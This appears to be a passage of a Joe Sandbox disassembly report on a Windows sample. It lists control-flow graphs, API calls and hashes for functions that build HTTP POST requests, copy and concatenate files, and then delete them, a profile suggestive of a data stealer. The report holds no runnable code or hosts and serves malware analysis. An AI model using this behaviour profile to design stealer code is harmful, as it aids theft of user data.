                                                                                                      • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                      • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                      • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                      • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00404DC0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569stringnetworkmemoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 179 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 202 404ee3 179->202 203 404eea-404eee 179->203 202->203 204 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 203->204 205 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 203->205 204->205 268 40500d-40501b 204->268 269 405029 268->269 270 40501d-405027 268->270 271 405033-405065 HttpOpenRequestA 269->271 270->271 272 40556b-405572 InternetCloseHandle 271->272 273 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 271->273 272->205 427 4054ea-405514 InternetReadFile 273->427 428 405516-40551d 427->428 429 40551f-405565 InternetCloseHandle 427->429 428->429 430 405521-40555f call 416fb0 call 416ea0 call 416e00 428->430 429->272 430->427
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                      • HttpOpenRequestA.WININET(00000000,02DD5050,?,02DD9608,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02DD4FA0,00000000,?,02D91B60,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                      • memcpy.MSVCRT ref: 00405443
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                      • memcpy.MSVCRT ref: 0040546A
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                      • memcpy.MSVCRT ref: 004054A5
                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                      • String ID: ------$"$"$"$--$------$------$------
                                                                                                      • API String ID: 2633831070-2774362122
                                                                                                      • Opcode ID: 3699202b8c86c7d7bae2930d23856af2bcc7052f5afe070d448807b924fd9dab
                                                                                                      • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                      • Opcode Fuzzy Hash: 3699202b8c86c7d7bae2930d23856af2bcc7052f5afe070d448807b924fd9dab
                                                                                                      • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00405610 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 438 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 453 4056d4-4056d8 438->453 454 4056cd 438->454 455 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 453->455 456 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 453->456 454->453 465 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 455->465 466 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 455->466 456->455 540 40585c-40586a 456->540 466->465 541 405878 540->541 542 40586c-405876 540->542 543 405882-4058b5 HttpOpenRequestA 541->543 542->543 544 405c63-405c6a InternetCloseHandle 543->544 545 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 543->545 544->455 654 405be2-405c0c InternetReadFile 545->654 655 405c17-405c5d InternetCloseHandle 654->655 656 405c0e-405c15 654->656 655->544 656->655 657 405c19-405c57 call 416fb0 call 416ea0 call 416e00 656->657 657->654
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 004056C3
                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02DD4FB0,00000000,?,02D91B60,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                      • memcpy.MSVCRT ref: 00405B73
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                      • memcpy.MSVCRT ref: 00405BAB
                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                      • HttpOpenRequestA.WININET(00000000,02DD5050,?,02DD9608,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                      • String ID: "$"$------$------$------$-A$-A
                                                                                                      • API String ID: 148854478-602752961
                                                                                                      • Opcode ID: 20f318af1127fa3fc85e80c7073bb5cfd3b10ea22113a06a73a764af5392ed78
                                                                                                      • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                      • Opcode Fuzzy Hash: 20f318af1127fa3fc85e80c7073bb5cfd3b10ea22113a06a73a764af5392ed78
                                                                                                      • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1037 40a030-40a04c call 417070 1040 40a05d-40a071 call 417070 1037->1040 1041 40a04e-40a05b call 416e20 1037->1041 1046 40a082-40a096 call 417070 1040->1046 1047 40a073-40a080 call 416e20 1040->1047 1048 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1041->1048 1046->1048 1056 40a098-40a0b8 call 416e00 * 3 call 413220 1046->1056 1047->1048 1080 40a12d-40a134 1048->1080 1074 40a6cf-40a6d2 1056->1074 1081 40a170-40a184 call 416d40 1080->1081 1082 40a136-40a152 call 4170d0 * 2 CopyFileA 1080->1082 1087 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1081->1087 1088 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1081->1088 1094 40a154-40a16e call 416da0 call 415bd0 1082->1094 1095 40a16c 1082->1095 1147 40a319-40a331 call 4170d0 1087->1147 1088->1147 1094->1080 1095->1081 1155 40a680-40a692 call 4170d0 DeleteFileA call 417040 1147->1155 1156 40a337-40a355 1147->1156 1168 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1155->1168 1163 40a666-40a67d 1156->1163 1164 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1156->1164 1163->1155 1167 40a372-40a375 1164->1167 1171 40a37c-40a382 1167->1171 1168->1074 1174 40a601-40a60e lstrlen 1171->1174 1175 40a388-40a42a call 416d40 * 6 call 417070 1171->1175 1177 40a610-40a650 lstrlen call 416da0 call 401500 call 404dc0 call 416e00 1174->1177 1178 40a655-40a663 memset 1174->1178 1216 40a42c-40a43b call 416e20 1175->1216 1217 40a43d-40a446 call 416e20 1175->1217 1177->1178 1178->1163 1221 40a44b-40a45d call 417070 1216->1221 1217->1221 1224 40a470-40a479 call 416e20 1221->1224 1225 40a45f-40a46e call 416e20 1221->1225 1228 40a47e-40a48e call 4170b0 1224->1228 1225->1228 1232 40a490-40a498 call 416e20 1228->1232 1233 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1228->1233 1232->1233 1233->1167
                                                                                                      APIs
                                                                                                        • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                      • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                      • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                      • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                      • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                      • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                      • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                      • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                      • memset.MSVCRT ref: 0040A65D
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 2228671196-0
                                                                                                      • Opcode ID: 7e379cea82dbd82070d166ba97bbe28dc3ceb3c8b6954320ffdeae1ebf685c7b
                                                                                                      • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                      • Opcode Fuzzy Hash: 7e379cea82dbd82070d166ba97bbe28dc3ceb3c8b6954320ffdeae1ebf685c7b
                                                                                                      • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                      • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                      • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                      • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                      • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                      • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                      • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                      • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                      • memset.MSVCRT ref: 0040CAD2
                                                                                                        • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1973479514-0
                                                                                                      • Opcode ID: 32ba6412fb565d8a1011b08ec77e67a79d3f7f1a06a611df1434b1d0c67e7452
                                                                                                      • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                      • Opcode Fuzzy Hash: 32ba6412fb565d8a1011b08ec77e67a79d3f7f1a06a611df1434b1d0c67e7452
                                                                                                      • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00404540 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1432 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1447 404604 1432->1447 1448 40460b-40460f 1432->1448 1447->1448 1449 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1448->1449 1450 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1448->1450 1449->1450 1536 404793-404797 1449->1536 1460 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1450->1460 1461 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1450->1461 1461->1460 1537 4047a5 1536->1537 1538 404799-4047a3 1536->1538 1539 4047af-4047e2 HttpOpenRequestA 1537->1539 1538->1539 1540 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1539->1540 1541 404b7e-404b85 InternetCloseHandle 1539->1541 1652 404af2-404b1c InternetReadFile 1540->1652 1541->1450 1653 404b27-404b79 InternetCloseHandle call 416e00 1652->1653 1654 404b1e-404b25 1652->1654 1653->1541 1654->1653 1655 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1654->1655 1655->1652
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
